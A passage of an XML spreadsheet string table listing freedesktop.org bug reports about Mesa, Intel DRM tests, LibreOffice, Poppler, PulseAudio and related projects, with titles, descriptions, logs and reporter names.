    <t>jradmacher</t>
  </si>
  <si>
    <t>LIBFPRINT-56715</t>
  </si>
  <si>
    <t>AES2501 driver improvements</t>
  </si>
  <si>
    <t>AES2501 driver needs some image improvements:
* image contrast is not as good as on AES2550
* driver stops scan immediately after empty frame was received but sometimes we get empty frames in the middle of scan</t>
  </si>
  <si>
    <t>DRI-105343</t>
  </si>
  <si>
    <t>[CI] igt@gem_exec_schedule@pi-ringfull-bsd2 - fail - Failed assertion: __execbuf(fd &amp;execbuf) == -4</t>
  </si>
  <si>
    <t>(gem_exec_schedule:1270) CRITICAL: Test assertion failure function test_pi_ringfull file gem_exec_schedule.c:898:
(gem_exec_schedule:1270) CRITICAL: Failed assertion: __execbuf(fd &amp;execbuf) == -4
(gem_exec_schedule:1270) CRITICAL: Last errno: 4 Interrupted system call
(gem_exec_schedule:1270) CRITICAL: error: 0 != -4
Subtest pi-ringfull-bsd2 failed.
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3856/shard-kbl2/igt@gem_exec_schedule@pi-ringfull-bsd2.html</t>
  </si>
  <si>
    <t>DRI-86962</t>
  </si>
  <si>
    <t>[HSW/BDW Regression]igt/kms_flip/vblank-vs-hang causes system hang</t>
  </si>
  <si>
    <t>==System Environment==
--------------------------
Regression: Yes.
Good commit on -next-queued: 65fa5f773196ccc88c4aae43ece9119f092c20a6(2014_11_26)
Non-working platforms: HSW
==kernel==
--------------------------
origin/drm-intel-nightly: 2014_12_03(fails)
origin/drm-intel-next-queued:d06cced8fa81d56e56ab34e93a83236b151c2a76(fails)
    drm/i915: Move init_unused_rings to gem_init_hw
origin/drm-intel-fixes: b0616c5306b342ceca07044dbc4f917d95c4f825(works)
    drm/i915: Unlock panel even when LVDS is disabled
==Bug detailed description==
-----------------------------
igt/kms_flip/vblank-vs-hang causes system hang.
Because system hang unable to catch dmesg 
Output:
[root@x-hsw27 tests]# ./kms_flip --run-subtest vblank-vs-hang
IGT-Version: 1.8-g4e5c16c (x86_64) (Linux: 3.18.0-rc7_drm-intel-nightly_691817_20141202+ x86_64)
Using monotonic timestamps
Beginning vblank-vs-hang on crtc 8 connector 18
  1024x768 60 1024 1048 1184 1344 768 771 777 806 0xa 0x40 65000
.............................................................
vblank-vs-hang on crtc 8 connector 18: PASSED
Beginning vblank-vs-hang on crtc 12 connector 18
  1024x768 60 1024 1048 1184 1344 768 771 777 806 0xa 0x40 65000
....................................................Test assertion failure function wait_for_events file kms_flip.c:1171:
Failed assertion: ret &gt; 0
select timed out or error (ret 0)
Subtest vblank-vs-hang: FAIL (21.814s)
Warning on condition flags != 0 in fucntion check_stop_rings file drmtest.c:112
i915_ring_stop flags on exit 0x400000ff can't quiescent gpu cleanly
Write failed: Broken pipe
==Reproduce steps==
---------------------------- 
1. ./kms_flip --run-subtest vblank-vs-hang</t>
  </si>
  <si>
    <t>DRI-100187</t>
  </si>
  <si>
    <t>[IVB] Text corruption in Gedit</t>
  </si>
  <si>
    <t>Created attachment 130203
screenshot of corruption
Bug description:
When dragging the window width handle back and forth the text in the window can become corrupted as in the screenshot or can also become blacked out.
System environment:
-- chipset: IVB
-- system architecture: 64-bit
-- xf86-video-intel: 2.99.917+git20161206-1
-- xserver: X.Org X Server 1.19.2
-- mesa: OpenGL core profile version string: 3.3 (Core Profile) Mesa 13.0.5
-- libdrm: Version: 2.4.74
-- kernel: 4.9.0-2-amd64
-- Linux distribution: Debian Stretch
-- Machine or mobo model:
-- Display connector: DVI
Reproducing steps:
Grab the handle on the left or right side and pull the window size in either direction
Additional info:</t>
  </si>
  <si>
    <t>brandonjsnider</t>
  </si>
  <si>
    <t>DRI-91805</t>
  </si>
  <si>
    <t>Graphics corruption - stuck on render ring</t>
  </si>
  <si>
    <t>On an HP Mini 110 running Arch Linux I am seeing regular graphics corruption (up to several times an hour). Dmesg has the message stuck on render ring and requests filling a new bug report.
All existing rendered elements become largely garbled. Reloading a page will render correctly but existing UI elements stay corrupted. Usually have to reboot to clear properly (not tried log out/in).
Typical usage is running Mate desktop and Firefox.
uname - a == Linux MyPCName 4.1.5-1-ARCH #1 SMP PREEMPT Tue Aug 11 15:56:51 CEST 2015 i686 GNU/Linux</t>
  </si>
  <si>
    <t>DBUS-71187</t>
  </si>
  <si>
    <t>Dbus Selinux:get selinux class value and access perm from selinux policy</t>
  </si>
  <si>
    <t>Created attachment 88559
modify the original code to get the selinux class value and perm from seinux policy
When I use Fedora 19 to write some selinux policy based on MDP which is  provided by kernel.There is something wrong with dbus the error message in dmesg is SELinux:  Invalid class 52 and I found the definition of dbus in falsk.h is #define SECCLASS_DBUS  52.
Because current dbus's code use the harded code selinux class value the definition of dbus class must be 52nd in every selinux policy.
SELinux can dynamically discover class and permission values upon policy load the order for the selilnux class is not important.
I think we should get the class value and perm access vector bit according to the selinux policy instead of the hard coded value from flask.h and av_permission.h.
What do you think of it?The attachment is the code that I have modified to achieve this function.</t>
  </si>
  <si>
    <t>osmond.sun</t>
  </si>
  <si>
    <t>LIBVA-50390</t>
  </si>
  <si>
    <t>gstreamer-vaapi does not work with g45</t>
  </si>
  <si>
    <t>Hi
OS is Gentoo amd64 and my laptop is a Samsung X360 (so gm45).
I'm using x11-libs/libva git (g45-h264 branch) and x11-libs/libva-intel-driver bit (g45-h264 branch).
media-libs/gstreamer-0.10.36
media-libs/gst-plugins-base-0.10.36
media-libs/gst-plugins-bad-0.10.23
Using media-plugins/gst-plugins-vaapi git.
Also using:
linux 3.4.0-rt7 (realtime patchset)
libdrm git
x11-drivers/xf86-video-intel-2.19.0 (sna off vaapi is much slower with sna on)
media-libs/mesa-8.0.2
x11-base/xorg-server-1.12.1.902
SwapbuffersWait off
vblank_mode value=0
kwin desktop effects off
vaapi h264 works flawlessly with mplayer:
mplayer -vo vaapi -va vaapi test.mkv
MPlayer SVN-r33094-4.5.3 (C) 2000-2011 MPlayer Team
Riproduco test.mkv.
Rilevato formato file libavformat!
[matroskawebm @ 0x335a580] Estimating duration from bitrate this may be inaccurate
[lavf] stream 0: video (h264) -vid 0 test.mkv
[lavf] stream 1: audio (ac3) -aid 0 -alang eng AC3 5.1 channels 640kbps
VIDEO:  [H264]  1920x1080  0bpp  24.000 fps    0.0 kbps ( 0.0 kbyte/s)
Informazioni file multimediale:
 title: test.mkv
Load subtitles in ./
libva: libva version 0.32.0
libva: va_getDriverName() returns 0
libva: Trying to open /usr/lib64/va/drivers/i965_drv_video.so
libva: va_openDriver() returns 0
==========================================================================
Apertura decoder video: [ffmpeg] FFmpeg's libavcodec codec family
[VD_FFMPEG] VA API accelerated codec.
Scelto codec video: [ffh264] vfm: ffmpeg (FFmpeg H.264)
==========================================================================
==========================================================================
Apertura decoder audio: [ffmpeg] FFmpeg/libavcodec audio decoders
AUDIO: 48000 Hz 2 ch s16le 640.0 kbit/41.67% (ratio: 80000-&gt;192000)
Scelto codec audio: [ffac3] afm: ffmpeg (FFmpeg AC-3)
==========================================================================
Unfortunately it doesn't work with gstreamer-vaapi:
niko@laptop ~ $ dragon test.mkv
QPainter::begin: Paint device returned engine == 0 type: 2
QPainter::begin: Paint device returned engine == 0 type: 2
QPainter::begin: Paint device returned engine == 0 type: 2
QPainter::begin: Paint device returned engine == 0 type: 2
No accelerated IMDCT transform found
QPainter::begin: Paint device returned engine == 0 type: 2
QPainter::begin: Paint device returned engine == 0 type: 2
libva: libva version 0.32.0
libva: va_getDriverName() returns 0
libva: Trying to open /usr/lib64/va/drivers/i965_drv_video.so
libva: va_openDriver() returns 0
dragon: i965_avc_bsd.c:337: i965_avc_bsd_slice_state: Assertion `frame_idx fsid_list) / sizeof((i965_h264_context-&gt;fsid_list)[0]))' failed.
KCrash: Application 'dragon' crashing...
KCrash: Attempting to start /usr/lib64/kde4/libexec/drkonqi from kdeinit
sock_file=/home/niko/.kde4/socket-laptop/kdeinit4__0
dragon: Fatal IO error: client killed
[1]+  Stopped                 dragon test.mkv
While with gst-launch I get:
niko@laptop ~ $ gst-launch-0.10 -v filesrc location=test.mkv ! matroskademux ! vaapidecode ! vaapisink
Impostazione della pipeline a PAUSED ...
libva: libva version 0.32.0
libva: va_getDriverName() returns 0
libva: Trying to open /usr/lib64/va/drivers/i965_drv_video.so
libva: va_openDriver() returns 0
La pipeline Ã¨ in PREROLLING ...
/GstPipeline:pipeline0/GstVaapiDecode:vaapidecode0.GstPad:src: caps = video/x-surface width=(int)1920 height=(int)1080 framerate=(fraction)5000000/208333 pixel-aspect-ratio=(fraction)1/1 type=(string)vaapi opengl=(boolean)true
/GstPipeline:pipeline0/GstVaapiDecode:vaapidecode0.GstPad:sink: caps = video/x-h264 level=(string)4.1 profile=(string)high codec_data=(buffer)01640029ffe1001867640029acd940780227e584000cb73402625a023c60c65801008668e93b3ce5531cc305d2628d13080214868783a1c0d04e12142c0ac0da02fe10042ad35e9e850b748c778a1410088b172105449ca3050e204448b20a4d8a081827090809848541dc4290a43164215a201900cae8340f81e86f03300b6017002ac05981d61a07802a8400a902087404700bc010506e036404b811805902e07203e0087ff858f0 stream-format=(string)avc alignment=(string)au width=(int)1920 height=(int)1080 pixel-aspect-ratio=(fraction)1/1 framerate=(fraction)5000000/208333
gst-launch-0.10: i965_avc_bsd.c:337: i965_avc_bsd_slice_state: Assertion `frame_idx fsid_list) / sizeof((i965_h264_context-&gt;fsid_list)[0]))' failed.
Annullato
Hope you can help no one is going to maintain mplayer-vaapi anymore and there is no hope for mplayer2-vaapi. I also tried vlc with vaapi but it sucks hards (it stutter you just can't watch a video with vlc and vaapi).
Thanks
NiccolÃ²
If you need a test file: http://files.linuxsystems.it//data/public/e4ebbd641c4af55713a127c1ae59b51c.php?lang=en
200MB 90 seconds. Quite heavy 1080p
Estimated download time: from half an hour to one hour.
See also: http://lists.freedesktop.org/archives/intel-gfx/2012-May/017877.html</t>
  </si>
  <si>
    <t>feng.yuan</t>
  </si>
  <si>
    <t>DRI-88392</t>
  </si>
  <si>
    <t>[BSW] igt/gem_exec_big fails</t>
  </si>
  <si>
    <t>Created attachment 112202
dmesg
==System Environment==
--------------------------
Regression: yes(IGT)
good commit: 25cf0551c7d210c8c085c109891dc97a2cc61e27
bad commit: 5fb26d1469f95ea93df2f047f57c0cdcf27da5d7
Non-working platforms: PNV
==kernel==
--------------------------
Latest drm-intel-nightly kernel and patch https://bugs.freedesktop.org/show_bug.cgi?id=88191#c9
==Bug detailed description==
-----------------------------
It also has bug 88191 it fixed on igt 25cf055 by  patch https://bugs.freedesktop.org/show_bug.cgi?id=88191#c9  apply the patch and test on the latest igt it will report following fail.
output:
IGT-Version: 1.9-g5fb26d1 (i686) (Linux: 3.19.0-rc4_kcloud_d574c4_20150113+ i686)
Test assertion failure function gem_execbuf file ioctl_wrappers.c:437:
Failed assertion: ret == 0
Last errno: 28 No space left on device
==Reproduce steps==
---------------------------- 
1. ./gem_exec_big</t>
  </si>
  <si>
    <t>LIBREOFFICE-46923</t>
  </si>
  <si>
    <t>CRASH EDITING Thai text</t>
  </si>
  <si>
    <t>Created attachment 57959
Problem description with sample data
LibreOffice crashes by some Thai character sequence input in Calc
LibreOffice 3.5.0rc3 under Windows 7 Professional.
While using Calc and keying in some specific pattern of mixed Thai and English texts at the Input Line the whole LibreOffice application i.e. all opened Calc files Writer files etc. crash with the last entry of a specific Thai character string. See attached file for detail.
Other minor problem with Thai characters which might relate to this bug.
1. Cell content starting with Thai character is displayed right aligned. It should be left-aligned by default.
2. Some character combinations cause Input Line Tab name Input Line of Rename Sheet pop-up window to display strange characters.
3. Some long mixed Thai-English text are displayed with wrongly-spaced characters at the Input Line.</t>
  </si>
  <si>
    <t>panyazone</t>
  </si>
  <si>
    <t>UDISKS-24665</t>
  </si>
  <si>
    <t>please add time stamps for devkit-disks --monitor</t>
  </si>
  <si>
    <t>devkit-disks --monitor is helpful to debug user problems.
It would imho be even more helpful if every event had a timestamp like e.g. gnome-power-manager --verbose does</t>
  </si>
  <si>
    <t>MESA-33221</t>
  </si>
  <si>
    <t>Configure incorrectly determines whether C++ compiler understands -fvisibility=hidden</t>
  </si>
  <si>
    <t>When Configure attempts to determin whether the C++ compiler understands -fvisibility=hidden it always concludes that it does.  This is because it does the test link using the C compiler with CFLAGS which at that time does not contain -fvisibility=hidden.  The test adds -fvisibility=hidden to CXXFLAGS but that does not get used in the test compile.</t>
  </si>
  <si>
    <t>bryanh</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-9198</t>
  </si>
  <si>
    <t>upgrade wiki</t>
  </si>
  <si>
    <t>your wiki is from stoneage. I strongly suggest to upgrade. If help is needed I
can  do some help because I know Moin wiki quite well.
Thilo</t>
  </si>
  <si>
    <t>POPPLER-34053</t>
  </si>
  <si>
    <t>Poppler ignores rendering intents and always uses INTENT_RELATIVE_COLORIMETRIC</t>
  </si>
  <si>
    <t>Currently all color transforms have INTENT_RELATIVE_COLORIMETRIC hard coded as the intent.  This is contrary to the PDF specification since intent should be pulled from the dictionary and transforms should be created and cashed for each object with a different intent.
I know this is complex but it will be needed for the new color managed PDF printing work flow on Linux.  OpenPrinting.org is in the process of starting testing of this and there are currently plans to include this in Ubuntu Natty.  But without a correct implementation of rendering intents it may not be a workable solution.</t>
  </si>
  <si>
    <t>hvengel</t>
  </si>
  <si>
    <t>LIBREOFFICE-84000</t>
  </si>
  <si>
    <t>Improve precision of the VCL Timer on Windows</t>
  </si>
  <si>
    <t>Impress rendering appears to be rate-limited by the VCL main-loop at 65 fps.</t>
  </si>
  <si>
    <t>XORG-15072</t>
  </si>
  <si>
    <t>xorg/build/xorg/app/xmessage - Compile warning fixes</t>
  </si>
  <si>
    <t>Declare xmessage.c:detab as static to avoid warning about missing prototype.
  Also remove CVS id variable and the printing of it in xmessage -help.</t>
  </si>
  <si>
    <t>WAYLAND-101743</t>
  </si>
  <si>
    <t>xinput disable keyboard disables touchpad too</t>
  </si>
  <si>
    <t>I have laptop with a faulty keyboard which I disable to avoid accidental presses.
&gt; xinput disable keyboard:AT Translated Set 2 keyboard
Here is what happens:
1) I type command using same faulty keyboard due to Disable while typing touchpad gets disabled temporarily (while I am typing)
2) I finish typing command and press Enter the keyboard gets disabled as expected.
3) But the problem here is touchpad does not get re-enabled and remains disabled forever too. (because Disable while typing flag is still active)
Ofcourse I can solve this by using another keyboard to disable the laptop keyboard.
But reporting the bug because its error in code flow.
i.e. when keyboard is disabled Disable while typing should be disabled too. So that touchpad gets activated again.</t>
  </si>
  <si>
    <t>anon.amish</t>
  </si>
  <si>
    <t>LIBREOFFICE-84061</t>
  </si>
  <si>
    <t>Listeners are not set correctly in SdrTextObj::ImpSetTextStyleSheetListeners</t>
  </si>
  <si>
    <t>The code in SdrTextObj::ImpSetTextStyleSheetListeners is obviously not working correctly.
The families of the stylesheets are appended to the name of the family for further usage.
An encoded string looks like STYLE_NAME|3     
The family is then extracted by copying the first (length-6) bytes e.g. STYLE_NAME in this example. Then another copy starting a position 1 is created e.g. TYLE_NAME. This string is cast to an Int32. Since this is not possible 0 is returned and the originally stored family is lost.</t>
  </si>
  <si>
    <t>drtl</t>
  </si>
  <si>
    <t>SYSTEMD-85447</t>
  </si>
  <si>
    <t>type anually -&gt; annually in calendarspec.</t>
  </si>
  <si>
    <t>Hi
I found a typo there:
http://cgit.freedesktop.org/systemd/systemd/tree/src/shared/calendarspec.c#n690
anually -&gt; annually
http://en.wiktionary.org/wiki/annually
Alexandre Detiste</t>
  </si>
  <si>
    <t>MESA-33296</t>
  </si>
  <si>
    <t>gnome-shell broken possibly due to glReadPixels() error</t>
  </si>
  <si>
    <t>Created attachment 42232
gnome-shell (under gdb) output
Hi!
I've been testing gnome-shell from git (clutter mutter etc. from git too).  I initially got crashing as in https://bugs.freedesktop.org/show_bug.cgi?id=32918
I updated to latest xorg &amp; mesa from ubuntu xorg-edgers PPA  (mesa 7.11.0-git20110119) this fixes the crashing but mouse events now mostly do not work and produce warnings like this:
(mutter:28983): Clutter-WARNING **: The required ID of 12107392 does not refer to an existing actor this usually implies that the pick() of an actor is not correctly implemented or that there is an error in the glReadPixels() implementation of the GL driver.
Clutter bug on this issue: https://bugs.freedesktop.org//show_bug.cgi?id=24408</t>
  </si>
  <si>
    <t>DRI-48753</t>
  </si>
  <si>
    <t>[SNB regression rc6] Oglc glsl-bif-tex-lod(advanced.glsl130.textureLod.array1d) causes system hang with fixes kernel</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Arch:            X86_64
Platform:        Sandybridge
Libdrm:		(master)2.4.33-12-g292da616fe1f936ca78a3fa8e1b1b19883e343b6
Mesa:		(8.0)9f150ffe8ee5f184861a377637091e4f06210927
Kernel:	        (drm-intel-fixes) 15a13bbdffb0d6288a5dd04aee9736267da1335f
Bug detailed description:
-----------------------------
It happens on Sandybridge with drm-intel-fixes kernel.It doesn't happen on queued kernel.
The lastest known good commit:b250da79a0c972ef7f6d58ebd1083cab066e6c82
The lastest konwn bad commit:15a13bbdffb0d6288a5dd04aee9736267da1335f
Reproduce steps:
----------------------------
1. start X
2. ./oglconform -z -suite all -v 2 -D 125 -test glsl-bif-tex-lod advanced.glsl130.textureLod.array1d</t>
  </si>
  <si>
    <t>MESA-70581</t>
  </si>
  <si>
    <t>./autogen.sh warnings in Mesa build system since commit 4e9028b</t>
  </si>
  <si>
    <t>Introduced with
http://cgit.freedesktop.org/mesa/mesa/commit/?id=4e9028b
./autogen.sh
src/gallium/state_trackers/egl/Makefile.sources:20: warning: variable 'gdi_SOURCES' is defined but no program or
src/gallium/state_trackers/egl/Makefile.sources:20: library has 'gdi' as canonical name (possible typo)
src/gallium/state_trackers/egl/Makefile.am:25:   'src/gallium/state_trackers/egl/Makefile.sources' included from here
src/gallium/state_trackers/egl/Makefile.sources:10: warning: variable 'android_SOURCES' is defined but no program or
src/gallium/state_trackers/egl/Makefile.sources:10: library has 'android' as canonical name (possible typo)
src/gallium/state_trackers/egl/Makefile.am:25:   'src/gallium/state_trackers/egl/Makefile.sources' included from here</t>
  </si>
  <si>
    <t>PULSEAUDIO-90489</t>
  </si>
  <si>
    <t>[regression] DYNAMIC_LATENCY introduced in module-combine causes a race contition between pa_sink_render_into_full and sink_update_requested_latency_cb in alsa-sink.c</t>
  </si>
  <si>
    <t>When sink_update_requested_latency() in src/modules/module-combine-sink.c:790 is called it posts a SINK_INPUT_MESSAGE_SET_REQUESTED_LATENCY message to all of it's output sinks. If one of the sinks is created by module-alsa-sink sink_update_requested_latency_cb() in src/alsa/alsa-sink.c:1507 is called to handle the latency change. This function except updating the latency sometimes also creates a rewind request. 
If the rewind request gets processed before the pa_sink_render_into_full() is called everything will work as supposed. However if not the !s-&gt;thread_info.rewind_requested assertion is being triggered on src/pulsecore/sink.c:1323 causing whole server to abort.
Commit that introduced this is here: http://cgit.freedesktop.org/pulseaudio/pulseaudio/commit/?id=23f120aabbf4d48d7012e196cf95d89ec6b6d8c8
Here's the part of PulseAudio's output:
[...]
I: [pulseaudio] protocol-native.c: Requested tlength=27211 ms minreq=2000 ms
D: [pulseaudio] protocol-native.c: Adjust latency mode enabled configuring sink latency to half of overall latency.
D: [pulseaudio] protocol-native.c: Requested latency=11605 ms Received latency=11605 ms
D: [pulseaudio] memblockq.c: memblockq requested: maxlength=4194304 tlength=27528 base=4 prebuf=24004 minreq=3528 maxrewind=0
D: [pulseaudio] memblockq.c: memblockq sanitized: maxlength=4194304 tlength=27528 base=4 prebuf=24004 minreq=3528 maxrewind=0
I: [pulseaudio] protocol-native.c: Final latency 27211 ms = 11605 ms + 2*2000 ms + 11605 ms
D: [combine] module-combine-sink.c: Sink update requested latency 11605
D: [combine] protocol-native.c: max_request changed trying to update from 27528 to 42336.
D: [combine] protocol-native.c: Notifying client about increased tlength
D: [alsa-sink-CX20757 Analog] alsa-sink.c: Latency set to 11605ms
D: [alsa-sink-CX20757 Analog] alsa-sink.c: hwbuf_unused=332300
D: [alsa-sink-CX20757 Analog] alsa-sink.c: setting avail_min=87311
D: [alsa-sink-CX20757 Analog] module-combine-sink.c: Sink input update max request 20468
D: [alsa-sink-CX20757 Analog] alsa-sink.c: Requesting rewind due to latency change.
D: [combine] module-combine-sink.c: Sink update max request 20468
E: [alsa-sink-CX20757 Analog] sink.c: Assertion '!s-&gt;thread_info.rewind_requested' failed at pulsecore/sink.c:1239 
The assertion is almost always triggered when following conditions are met:
- /etc/pulse/default.pa contains:
# alsa_output.pci-0000_00_14.2.analog-stereo is the name of default output sink
load-module module-combine-sink sink_name=media slaves=alsa_output.pci-0000_00_14.2.analog-stereo resample_method=speex-float-1 format=s16le rate=44100 channels=2 
load-module module-sine sink=media frequency=440
set-default-source media.monitor
- module-sine's outputs to the sink created by module-combine-sink and is muted
- Audacity is starting while some program (Rhythmbox in my case) is playing sounds using the native protocol.</t>
  </si>
  <si>
    <t>marcel132132</t>
  </si>
  <si>
    <t>DRI-73040</t>
  </si>
  <si>
    <t>[BDW]igt/pm_rps fails</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform: Broadwell
kernel:   (drm-intel-nightly)5f7867f14f8b3688584f4bf589fe4b8aa8c718b3
Bug detailed description:
---------------------------
It always fails on Broadwell with -nightly -queued -fixes kernel.
output:
IGT-Version: 1.5-g72fe2b6 (x86_64) (Linux: 3.13.0-rc1_drm-intel-nightly_050ccd_20131206+ x86_64)
Test assertion failure function checkit file pm_rps.c:110:
Last errno: 22 Invalid argument
Failed assertion: 0
Reproduce steps:
-------------------------
1../pm_rps</t>
  </si>
  <si>
    <t>POPPLER-17226</t>
  </si>
  <si>
    <t>pdftops synopsis in man page incorrectly indicates that pdf file is optional</t>
  </si>
  <si>
    <t>Hi
pdftops' manpage indicates that the PDF file argument is optional which is incorrect (in synopsis).  Will attach a patch.
Bye</t>
  </si>
  <si>
    <t>lool</t>
  </si>
  <si>
    <t>PORTLAND-8162</t>
  </si>
  <si>
    <t>New application fails to show up in gnome menu</t>
  </si>
  <si>
    <t>When installed as user and ~/.local/share/applications didn't exist at the 
time gnome-panel was started.
SUSE 10.0 / gnome 2.12</t>
  </si>
  <si>
    <t>MESA-94909</t>
  </si>
  <si>
    <t>[llvmpipe] piglit fs-roundEven-float regression</t>
  </si>
  <si>
    <t>mesa: 35ade36c88e5aaa0b18c3cc911d9a4de3a60a80b (master 11.3.0-devel)
$ ./bin/shader_runner generated_tests/spec/glsl-1.30/execution/built-in-functions/fs-roundEven-float.shader_test -auto
Probe color at (360)
  Expected: 0.000000 1.000000 0.000000 1.000000
  Observed: 1.000000 0.000000 0.000000 1.000000
Probe color at (600)
  Expected: 0.000000 1.000000 0.000000 1.000000
  Observed: 1.000000 0.000000 0.000000 1.000000
PIGLIT: {result: fail }
e4f01da15d8c6ce3e8c77ff3ff3d2ce2574a3f7b is the first bad commit
commit e4f01da15d8c6ce3e8c77ff3ff3d2ce2574a3f7b
Author: Jose Fonseca 
Date:   Fri Apr 1 11:50:28 2016 +0100
    gallivm: Prefer backend agnostic intrinsic for rounding.
    We could unconditionally use these instrinsics but performance with SSE2
    would suck as LLVM falls back to calling libm.
    lp_test_arit.
    Reviewed-by: Roland Scheidegger 
:040000 040000 0f7b55e9ae1e5faa3e9ee24d5ab66605e5be096d 09bf79b798b6210887add905b1f91d8587b58bc2 M	src
bisect run success</t>
  </si>
  <si>
    <t>XORG-2540</t>
  </si>
  <si>
    <t>X server crash- 'unresolved function' when starting xpdf</t>
  </si>
  <si>
    <t>My machine is mostly SuSE 8.2 with a number of added new packages including
KDE 3.3.  
I've installed the new 6.8.2 release and I'm seeing the X server crash and die
with the singularly uninformative error:
'An unresolved function was called'
I can cause it every time when running xpdf which leads me to suspect font
rendering problems.  I have tried compiles with both my system freetype2
libraries and the included one but the problem remains.  Any clues?</t>
  </si>
  <si>
    <t>djm</t>
  </si>
  <si>
    <t>MESA-33433</t>
  </si>
  <si>
    <t>.type directives in glapi_x86.S miss required @ character</t>
  </si>
  <si>
    <t>Created attachment 42410
Add @ char before type specifier
While building Mesa with the trunk version of clang using its
integrated assembler it complains about the .type directives in
glapi_x86.S:
clang -c -I. -I../../../include -I../../../include/GL/internal -I../../../src/mesa -I../../../src/mesa/glapi -I/usr/local/include -I/usr/local/include/drm   -I/usr/local/include   -D_THREAD_SAFE -I/usr/local/include   -I/usr/local/include -O2 -pipe -fno-strict-aliasing -Wall -Wmissing-prototypes -std=c99 -ffast-math -fno-strict-aliasing  -fPIC  -DUSE_X86_ASM -DUSE_MMX_ASM -DUSE_3DNOW_ASM -DUSE_SSE_ASM -DHAVE_POSIX_MEMALIGN -DUSE_XCB -DPTHREADS -DUSE_EXTERNAL_DXTN_LIB=1 -DIN_DRI_DRIVER -DHAVE_ALIAS -DGLX_INDIRECT_RENDERING -DGLX_DIRECT_RENDERING -DXF86VIDMODE -D_REENTRANT -UIN_DRI_DRIVER -DDEFAULT_DRIVER_DIR=\/usr/local/lib/dri\  ../../../src/mesa/x86/glapi_x86.S -o ../../../src/mesa/x86/glapi_x86.o
/tmp/cc-vj1ww7.s:30:50: error: expected '@' or '%' before type
 .balign 16 .globl glNewList  .type glNewList function glNewList: movl _glapi_Dispatch%eax  testl %eax%eax  je 1f  jmp *4 * 0(%eax)  1: call _x86_get_dispatch  jmp *4 * 0(%eax)
                                                 ^
These .type directives are expanded from the GLOBL_FN macro in the same
file:
#define GLOBL_FN(x) GLOBL x  .type x function
However the actual type specifier following the comma should normally
be preceded by an '@' character.  For reference see the binutils
documentation about the .type directive here:
  http://sourceware.org/binutils/docs/as/Type.html
Most of the other .S files in Mesa also use an '@' character so I would
like to propose to do the same here for portability between assemblers.
Since this particular .S file seems to be generated from gl_x86_asm.py
I have also updated that script to match.</t>
  </si>
  <si>
    <t>dimitry</t>
  </si>
  <si>
    <t>LIBREOFFICE-59516</t>
  </si>
  <si>
    <t>FILEOPEN: Native MySQL-connector  couldnt be installed under Windows in LO 4.0</t>
  </si>
  <si>
    <t>With windows you could install and work with mysql-connector-ooo-1.0.1-windows-intel or aoo-my-sdbc-1.1.0. Both versions couldn't be installed any more since LO 4.0 RC1:
loading component library failed: ... mysqlc.uno.dll</t>
  </si>
  <si>
    <t>WOCKY-26961</t>
  </si>
  <si>
    <t>WockyPorter should know its own JID.</t>
  </si>
  <si>
    <t>The connector returns a connection and the client's JID but nothing inside Wocky hangs onto that JID. So in Gabble the GabbleConnection remembers the JID but WockyPubsubNode (for example) doesn't know its own JID and hence can't provide useful helpers for subscribing to a node using your full JID or bare JID: the API user has to remember their own JID and pass it in.
Down with that sort of thing.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-29679</t>
  </si>
  <si>
    <t>Account request for Mesa (r600).</t>
  </si>
  <si>
    <t>Created attachment 37987
GPG key
Name: Henri Verbeet
E-Mail: hverbeet@gmail.com
Preferred account name: hverbeet</t>
  </si>
  <si>
    <t>hverbeet</t>
  </si>
  <si>
    <t>LIBREOFFICE-38595</t>
  </si>
  <si>
    <t>FILEOPEN: thin double line cell borders invisible</t>
  </si>
  <si>
    <t>To reproduce this problem:
0. Start Calc
1. Select any cell and right click on it select there Format Cells
2. Select tab Borders
3. in left upper corner in area Line arrangement Default select second button
4. in area Line in field Style select one thick and one thin line variant
5. in field Width select 075 
6. press Ok. Cell appears with strange double border
7. press File-&gt;Save and save document
8. press File-&gt;Reload 
border around cell disappears when reload
Reproduced on LibO 3.4 on Mandriva 64 bit and Windows XP 32 bit
PS: When width greater then 075 then border not disappears but changes after reload for examble 1.0 border becomes 15 border
Border looks strange if zoom of document is too small</t>
  </si>
  <si>
    <t>LIBREOFFICE-43424</t>
  </si>
  <si>
    <t>: LO Crashes while Comparing an Empty Document with Another Document</t>
  </si>
  <si>
    <t>PLO crashes when I tried accidentally to compare an empty document with a chapter of the LO Writer manual. 
In order to reproduce:
[1] Download Chapter 1 of the LibreOffice Writer Guide and save it to your computer. I used  the version for branch 3.4.x. (http://wiki.documentfoundation.org/Documentation/Publications)
[2] Start LO.
[3] Open a new text document.
[4] From the menu: Edit &gt; Compare Document...
[5] Select the file saved at step [1]. With my ancient Computer I have to wait some seconds then LO crashes.
3 hints:
- LO does not crash when I added a single character to the new document.
- LO does not crash when I compared the empty file with some documents I created. 
- After the crash a recovery is successful. 
Regards
Harald
Browser: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24</t>
  </si>
  <si>
    <t>HAL-10053</t>
  </si>
  <si>
    <t>Add software Bluetooth on/off for IBM laptops</t>
  </si>
  <si>
    <t>From bug #8570:
---8&lt;---
On thinkpads with ibm-acpi (http://ibm-acpi.sourceforge.net/) loaded you can
control bluetooth with:
echo enable &gt; /proc/acpi/ibm/bluetooth
echo disable &gt; /proc/acpi/ibm/bluetooth
There are also similar methods for the WLAN and WWAN modules.
---8&lt;---</t>
  </si>
  <si>
    <t>POPPLER-43441</t>
  </si>
  <si>
    <t>rendered line is too thin</t>
  </si>
  <si>
    <t>Created attachment 54044
the pdf file causing problem
poppler 0.18.1 evince 3.2.1 and pdf renders improperly one of the lines. the pdf causing problem and appropriate screenshot are attached.
checked with poppler 0.16 and evince 3.0 - the file is rendered ok.</t>
  </si>
  <si>
    <t>wrobell</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-17909</t>
  </si>
  <si>
    <t>please update my GPG key</t>
  </si>
  <si>
    <t>Created attachment 19377
my current GPG public key
I don't know what GPG key I have on my fd.o account currently if any but apparently it isn't the one I'm actually using.
Please set the account jamey to use GPG key 0E08F665. Thanks!</t>
  </si>
  <si>
    <t>LIBREOFFICE-70345</t>
  </si>
  <si>
    <t>[FILESAVE] I/O ERROR when saving document on a network file.</t>
  </si>
  <si>
    <t>Created attachment 87395
first error display
Hello
The file not being saved is simple_file_save_ko.ods and theprinted error are: 
